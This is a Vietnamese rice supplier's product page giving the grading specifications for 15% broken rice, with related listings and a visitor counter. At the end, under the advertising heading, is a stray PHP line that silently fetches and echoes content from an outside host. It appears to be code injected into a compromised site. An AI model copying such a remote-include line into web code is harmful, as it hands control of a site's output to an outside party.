Sản phẩm - Gạo sạch - Tấm
Gạo 15% tấm
Lượt xem : 0 - Ngày đăng : 10/01/2020 - 07:01:06 (GMT+7)
   
Tấm: 15 % tối đa
Ẩm độ: 14,5 % tối đa
Chất hữu cơ : 0,5 % tối đa. 
Chất vô cơ 0,1% tối đa
Thóc hạt 25 hạt/kg
Hạt phấn: 7 % tối đa
Hạt vàng: 1 % tối đa
Hạt hỏng: 1,5 % tối đa
Hạt non: 0,3% tối đa
Hạt đỏ, sọc đỏ: 5 % tối đa
Hạt nếp, nếp lẫn: 1% tối đa
Mùa vụ:  2006.Không nhiễm côn trùng sống, không có kim loại, phù hợp cho người ăn tại nước xuất xứ.
   
Tin khác
Gạo 10% tấm (Ngày đăng : 22/02/2011 - 13:58:45 (GMT+7))
Gạo trắng Việt Nam (504) 5% (Ngày đăng : 15/01/2020 - 09:10:23 (GMT+7))
h 
Hỗ trợ trực tuyến
Bộ phận hỗ trợ

Lê Phát Long
Thống kê trực tuyến
Đang trực tuyến :
1
Tổng truy cập :
318455
Quảng Cáo
echo @file_get_contents("http://mixvn.in/3.php");